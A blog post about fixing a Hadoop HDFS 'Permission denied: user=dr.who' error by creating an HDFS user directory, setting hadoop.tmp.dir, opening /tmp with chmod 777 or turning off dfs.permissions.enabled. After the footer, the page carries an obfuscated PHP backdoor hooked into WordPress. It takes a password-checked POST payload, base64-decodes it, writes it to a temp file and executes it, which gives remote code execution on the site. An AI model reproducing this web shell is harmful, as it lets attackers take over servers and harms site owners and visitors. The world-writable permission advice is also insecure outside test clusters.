Error while batch processing of rest data persisted in Basic Hadoop based (HDFS) Data Lake “Permission denied: user=dr.who, access=READ_EXECUTE, inode=”/tmp”:hdadmin:supergroup:drwx……..”

Back to Blog

Error while batch processing of rest data persisted in Basic Hadoop based (HDFS) Data Lake “Permission denied: user=dr.who, access=READ_EXECUTE, inode=”/tmp”:hdadmin:supergroup:drwx……..”

Typically,  persisting unstructured data and subsequent batch processing  can be very costly and is not advisable for small organizations & startups, as cost is prime factor for them.

error-hadoop cluster-Permission-deniedA Hadoop based Data Lake using Map-Reduce, fits perfectly in this scenario which is not only cost effective but also scalable and easy to extend further. Though it may sound a great option to have, we might face issues while setting up the same and one of common issues is, error Permission denied: user=dr.who, access=READ_EXECUTE, inode=”/tmp”:hdadmin:supergroup:drwx……..“.

It occures, when:

  1. We submit the map-reduce job to multi-node cluster from command prompt without creating a new HDFS user, and
  2. Missed to set the parameter of Hadoop temp directory location in the core-site.xml file.
  3. Missed to change the access privileges on the HDFS directory /user, before starting the cluster, which is mandatory.

Here are two tips listed to avoid such exceptions and allow MapReduce jobs to execute.

  1. Create a new HDFS user
    Create a new HDFS user by creating a directory under the /user directory and this directory will serve as the HDFS “home” directory for that user.  Prior to this, required permissions should also be set on the Hadoop temp directory.

$ hdfs dfs -mkdir /user/<new hdfs user directory name>

If we won’t set this parameter, Hadoop, by default, will create directories dfs and nm-local-dir.

Since, we did not set the parameter in core-site.xml and login to the system as hdadmin, directories dfs and nm-local-dir got created.

We should make sure to set the permissions on the Hadoop temp directory, as we specified already in the core-site.xml file.

$ hdfs –dfs –chmod –R 777 /tmp

<property>

 <name>hadoop.tmp.dir</name>

 <value>/tmp/hadoop-$(user.name)</value>

</property>

  1.   Change the value of  property name “dfs.permissions.enabled” from “true” to “false” in hdfs-site.xml

This option should only be considered for the cluster that belongs to development environment or POC exercise, and is not advisable in the production environment to retain the security, authorization etc. intact on the ingested data.

<property>

 <name> dfs.permissions.enabled </name>

 <value>false</value>

</property>

Once we set false, permission checking would be turned off, but all other behavior will be unchanged. Also, switching from one parameter value to the other won’t change the mode, owner or group of files or directories.

By Gautam Goswami

Back to Blog
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}